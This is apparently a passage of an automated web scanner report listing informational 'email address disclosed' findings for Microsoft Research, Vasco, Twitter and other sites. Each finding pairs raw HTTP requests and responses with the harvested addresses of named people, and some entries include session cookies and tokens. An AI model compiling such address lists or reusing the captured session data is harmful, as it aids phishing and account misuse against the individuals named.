ETag: "07a9d05d3ac71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:59 GMT
Connection: close
Content-Length: 14757

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
<a href="mailto:blampson@microsoft.com" onClick="stc(this, 1)"><span lang=FR
style='mso-ansi-language:FR'>blampson@microsoft.com</span>
...[SNIP]...

21.54. http://research.microsoft.com/en-us/um/people/borgs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/borgs/

Issue detail

The following email address was disclosed in the response:

borgs@microsoft.com

Request

GET /en-us/um/people/borgs/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.55. http://research.microsoft.com/en-us/um/people/heckerman/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/heckerman/

Issue detail

The following email address was disclosed in the response:

heckerma@microsoft.com

Request

GET /en-us/um/people/heckerman/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 15 Jun 2011 00:49:39 GMT
Accept-Ranges: bytes
ETag: "5283271bf62acc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:14 GMT
Connection: close
Content-Length: 167529

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
<a
href="mailto:heckerma@microsoft.com" onClick="stc(this, 3)">heckerma@microsoft.com</a>
...[SNIP]...

21.56. http://research.microsoft.com/en-us/um/people/hjzhang/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/hjzhang/

Issue detail

The following email address was disclosed in the response:

hjzhang@microsoft.com

Request

GET /en-us/um/people/hjzhang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 28 Jan 2009 10:28:47 GMT
Accept-Ranges: bytes
ETag: "267240343381c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:04 GMT
Connection: close
Content-Length: 16309

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:st1="urn:schemas-microsoft-com:office:smarttags
...[SNIP]...
<a href="mailto:hjzhang@microsoft.com" onClick="stc(this, 1)">hjzhang@microsoft.com</a>
...[SNIP]...

21.57. http://research.microsoft.com/en-us/um/people/horvitz/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/horvitz/

Issue detail

The following email address was disclosed in the response:

horvitz@microsoft.com

Request

GET /en-us/um/people/horvitz/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 19:43:44 GMT
Accept-Ranges: bytes
ETag: "15e4d0be8f86cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:56 GMT
Connection: close
Content-Length: 12571

<HTML><HEAD>
<title>Eric Horvitz's Homepage</title>
</HEAD>
<BODY BGCOLOR="#ffffff">
<H1>Eric Horvitz</H1>
<a href="Eric_Horvitz_Galapagos.jpg" onClick="stc(this, 1)"><IMG HEIGHT="257" WIDTH="216
...[SNIP]...
<A HREF="mailto: horvitz@microsoft.com" onClick="stc(this, 33)">horvitz@microsoft.com</A>
...[SNIP]...

21.58. http://research.microsoft.com/en-us/um/people/jchayes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/jchayes/

Issue detail

The following email address was disclosed in the response:

jchayes@microsoft.com

Request

GET /en-us/um/people/jchayes/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.59. http://research.microsoft.com/en-us/um/people/jgrudin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/jgrudin/

Issue detail

The following email addresses were disclosed in the response:

jgrudin@microsoft.com
pwinston@yahoo.com
tjak@get2net.dk

Request

GET /en-us/um/people/jgrudin/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 10 Aug 2011 01:34:54 GMT
Accept-Ranges: bytes
ETag: "1b84edb4fd56cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:11 GMT
Connection: close
Content-Length: 463318

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/
...[SNIP]...

...[SNIP]...
<tjak@get2net.dk>
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 4)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 10)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 46)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 47)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 48)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 49)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 50)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 51)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 52)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 53)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 54)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 55)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 57)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 58)">
...[SNIP]...
<a
href="mailto:jgrudin@microsoft.com" onClick="stc(this, 108)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 109)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 116)">
...[SNIP]...
<span
style='font-family:"Verdana","sans-serif";color:blue'>jgrudin@microsoft.com</span>
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 244)">
...[SNIP]...
<a href="mailto:jgrudin@microsoft.com" onClick="stc(this, 245)">
...[SNIP]...

21.60. http://research.microsoft.com/en-us/um/people/sdumais/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/sdumais/

Issue detail

The following email address was disclosed in the response:

sdumais@microsoft.com

Request

GET /en-us/um/people/sdumais/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 28 Jun 2011 22:28:16 GMT
Accept-Ranges: bytes
ETag: "254ceeace235cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:56 GMT
Connection: close
Content-Length: 121763

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
<a
href="mailto:sdumais@microsoft.com" onClick="stc(this, 3)">sdumais@microsoft.com</a>
...[SNIP]...

21.61. http://research.microsoft.com/en-us/um/people/ssaponas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/ssaponas/

Issue detail

The following email address was disclosed in the response:

ssaponas@microsoft.com

Request

GET /en-us/um/people/ssaponas/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 01 Oct 2010 14:22:46 GMT
Accept-Ranges: bytes
ETag: "f7186b1e7461cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:02 GMT
Connection: close
Content-Length: 30469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>T. Scott Sap
...[SNIP]...
<a href="mailto:ssaponas@microsoft.com" onClick="stc(this, 25)">ssaponas@microsoft.com</a>
...[SNIP]...
<a class="footer" href="mailto:ssaponas@microsoft.com" onClick="stc(this, 118)">
...[SNIP]...

21.62. http://research.microsoft.com/en-us/um/people/szeliski/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/szeliski/

Issue detail

The following email address was disclosed in the response:

szeliski@microsoft.com

Request

GET /en-us/um/people/szeliski/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.63. http://research.microsoft.com/en-us/um/people/zhang/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/zhang/

Issue detail

The following email address was disclosed in the response:

zhang@microsoft.com

Request

GET /en-us/um/people/zhang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:11 GMT
Connection: close
Content-Length: 44812

<html>
<head>
   <title>Zhengyou Zhang's Home Page</title>
   <meta name="author" content="Zhengyou Zhang">
   <meta name="keywords" content="Zhengyou Zhang, Computer vision, Image-based modeling, Face
...[SNIP]...
<a href="mailto:zhang@microsoft.com" onClick="stc(this, 1)">zhang@microsoft.com</a>
...[SNIP]...

21.64. http://research.microsoft.com/en-us/um/redmond/groups/ivm/ICE/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/groups/ivm/ICE/

Issue detail

The following email address was disclosed in the response:

HDView@microsoft.com

Request

GET /en-us/um/redmond/groups/ivm/ICE/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 31 May 2011 17:27:43 GMT
Accept-Ranges: bytes
ETag: "f63a93cb81fcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:15 GMT
Connection: close
Content-Length: 9398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:HDView@microsoft.com" onClick="stc(this, 21)">
...[SNIP]...

21.65. http://research.microsoft.com/en-us/um/redmond/groups/ivm/hdview/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/groups/ivm/hdview/

Issue detail

The following email address was disclosed in the response:

HDView@microsoft.com

Request

GET /en-us/um/redmond/groups/ivm/hdview/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Jul 2009 22:47:45 GMT
Accept-Ranges: bytes
ETag: "349bcf154ffc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:15 GMT
Connection: close
Content-Length: 8307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- #BeginTemplate "master/HDMa
...[SNIP]...
<a href="mailto:HDView@microsoft.com" onClick="stc(this, 28)">
...[SNIP]...

21.66. http://research.microsoft.com/en-us/um/redmond/projects/songsmith/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/projects/songsmith/

Issue detail

The following email address was disclosed in the response:

songsm@microsoft.com

Request

GET /en-us/um/redmond/projects/songsmith/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 18 Jul 2011 19:11:21 GMT
Accept-Ranges: bytes
ETag: "b695d67a7e45cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:13 GMT
Connection: close
Content-Length: 15875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--[if IE]>
<link re
...[SNIP]...
<a href="mailto:songsm@microsoft.com" onClick="stc(this, 25)">songsm@microsoft.com</a>
...[SNIP]...

21.67. http://scripts.omniture.com/javascript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.omniture.com
Path:	/javascript.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /javascript.js HTTP/1.1
Host: scripts.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316119783|check#true#1314910243|session#1314910182276-94505#1314912043; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Fri, 02 Sep 2011 21:22:50 GMT
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/javascript;charset=utf-8
Content-Length: 512255
Cache-Control: public, max-age=14400
Expires: Sat, 03 Sep 2011 18:43:32 GMT
Date: Sat, 03 Sep 2011 14:43:32 GMT
Connection: close

/* Version: 1.0 */
/* files/global/scripts/general/global.js */
/* files/global/scripts/general/validate_forms.js */
/* files/global/scripts/general/base64.js */
/* files/global/scripts/tracking/s_cod
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.68. http://shop.vasco.com/error_500.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.vasco.com
Path:	/error_500.aspx

Issue detail

The following email address was disclosed in the response:

vos.support@vasc.com

Request

GET /error_500.aspx?aspxerrorpath=/error_404.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: shop.vasco.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:19:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<a href="mailto:vos.support@vasc.com">vos.support@vasc.com</a>
...[SNIP]...

21.69. https://shop.vasco.com/legal.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.vasco.com
Path:	/legal.aspx

Issue detail

The following email address was disclosed in the response:

vos.support@vasco.com

Request

GET /legal.aspx HTTP/1.1
Host: shop.vasco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 21:26:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...

21.70. https://shop.vasco.com/privacy_statement.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.vasco.com
Path:	/privacy_statement.aspx

Issue detail

The following email address was disclosed in the response:

vos.support@vasco.com

Request

GET /privacy_statement.aspx HTTP/1.1
Host: shop.vasco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 21:26:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...

21.71. https://shop.vasco.com/terms_and_conditions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.vasco.com
Path:	/terms_and_conditions.aspx

Issue detail

The following email address was disclosed in the response:

vos.support@vasco.com

Request

GET /terms_and_conditions.aspx HTTP/1.1
Host: shop.vasco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 21:26:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...
<a href="mailto:vos.support@vasco.com" class="link_blue_12px_bold">vos.support@vasco.com</a>
...[SNIP]...

21.72. http://static.tumblr.com/fftf9xi/GXWlp9jjo/core.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.tumblr.com
Path:	/fftf9xi/GXWlp9jjo/core.css

Issue detail

The following email address was disclosed in the response:

nova@newezra.com

Request

GET /fftf9xi/GXWlp9jjo/core.css HTTP/1.1
Host: static.tumblr.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: T2dDk790ABLX9Rmexa/3dujGxuHuGpYmsPCWfmcFrTt1kOVo/1XbxTioHiBWaa8/
x-amz-request-id: 7684C514965281F6
Date: Sat, 03 Sep 2011 13:15:07 GMT
Last-Modified: Mon, 01 Aug 2011 19:02:13 GMT
ETag: "063c4db1d2dff66def24afa7fb094530"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 39538
Server: AmazonS3

/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nova - 1.1.0 ~ http://novatheme.tumblr.com/theme-version
Premium Tumblr Theme
http://novatheme.tumblr.com | @novatheme
Author: Jonathan Moore - http://jonathanmoore.com | nova@newezra.com | @newezra
_ __ ______
/ | / /__ _ __ / ____/___ _________ _
/ |/ / _ \ | /| / / / __/ /_ / / ___/ __ `/
/ /| / __/ |/ |/ / / /___ / /_/ / /
...[SNIP]...

21.73. https://support.microsoft.com/contactus/emailcontact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/contactus/emailcontact.aspx

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B06
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Sat, 03 Sep 2011 13:28:25 GMT
Connection: close
Content-Length: 28082

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="1247" /><meta name="DCSext.sup_cln" content="en" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln" content="en-us" />
...[SNIP]...
<strong>someone@example.com</strong>
...[SNIP]...

21.74. http://twitter.com/account/bootstrap_data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/bootstrap_data

Issue detail

The following email address was disclosed in the response:

ben@badscience.net

Request

GET /account/bootstrap_data?r=0.23595900414511561 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1314976448.1; __utmz=43838368.1314976448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; original_referer=fwhwi6Y0ffDC4jPtZF8dmmmty0iyoL%2B01UcGagyOYMVYvRuikxaIletcbtJnwOmKkSWbw5%2B8n4MFGbMW0LYNsQ%3D%3D; external_referer=fwhwi6Y0ffDC4jPtZF8dmmmty0iyoL%2B01UcGagyOYMVYvRuikxaIletcbtJnwOmKkSWbw5%2B8n4MFGbMW0LYNsQ%3D%3D%7C0; _twitter_sess=BAh7CToOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbXNmdHJlc2Vh%250AcmNoOg9jcmVhdGVkX2F0bCsILPBjLzIBIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ%253D--e88597cf7fe708f50c7e3819dc018c21a00605ee

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055072-3822-32071
ETag: "61a710df699da791abb3f6265b6a0ec6"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:32 GMT
X-Runtime: 0.05483
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 862d68db5e3bbc9dd4dbad8a3a189582a14c1c21
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlMWI0NDRjNmM0NjhiZDlkYTA0NzRjYjI0YTU1N2I2%250AMzg6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwgs8GMvMgEiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6B2lkIiVjMGY3NGNmOTcwMzg4MWM5NjQwODQ0Y2IyYjFkMGY3%250ANA%253D%253D--c42c76769866ad23056907ac9dc98a4d82925d68; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 24025
Connection: close

{"requestCacheSeedData":[],"userProperties":{},"postAuthenticityToken":"9f3714e53fe2a7a08d20f4acfca4808c3ece9768","deciderFeatures":{"dashboard_activity_followers":1,"tweet_stream_home_polling":1,"con
...[SNIP]...
:"DonorsChoose"},{"name":"ben goldacre","id":6705042,"description":"Nerd cheerleader, Bad Science person, stats geek, research fellow in epidemiology, procrastinator. If it's important, email's better ben@badscience.net","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/70122555\/n668387510_88777_2191_normal.jpg","screen_name":"bengoldacre"},{"name":"NCAA","id":31122496,"description":"","profile_image_url":
...[SNIP]...

21.75. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

Issue detail

The following email address was disclosed in the response:

jbinst@vasco.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:32:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 23672

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="mailto:jbinst@vasco.com">jbinst@vasco.com</a>
...[SNIP]...

21.76. http://vasco.com/js/rotating_banner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/js/rotating_banner.js

Issue detail

The following email address was disclosed in the response:

landofcoder@gmail.com

Request

GET /js/rotating_banner.js HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
